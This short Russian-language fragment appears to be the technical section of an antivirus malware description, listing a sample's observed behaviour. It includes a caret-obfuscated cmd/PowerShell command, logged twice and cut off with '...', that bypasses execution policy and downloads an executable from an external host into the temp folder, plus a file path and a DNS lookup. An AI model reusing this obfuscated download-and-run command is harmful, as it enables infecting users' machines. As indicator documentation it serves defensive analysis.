Техническая информация
- http://amy3.top/battlefield/ как $refq222ssa
- '<SYSTEM32>\cmd.exe' /c P^owe^rSh^el^l -E^xecut^ionPo^licy By^Pas^s -No^Pro^fil^e -co^mma^nd $refq222ssa=$env:temp+'\sperma.exe';(Ne^w-Obj^ec^t Ne^t.We^b^Cli^e^nt).DownloadFile('http://amy3.top/battlefield/',$refq2...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1900
- %TEMP%\992790.cvr
- DNS ASK am##.top
- '<SYSTEM32>\cmd.exe' /c P^owe^rSh^el^l -E^xecut^ionPo^licy By^Pas^s -No^Pro^fil^e -co^mma^nd $refq222ssa=$env:temp+'\sperma.exe';(Ne^w-Obj^ec^t Ne^t.We^b^Cli^e^nt).DownloadFile('http://amy3.top/battlefield/',$refq2...' (со скрытым окном)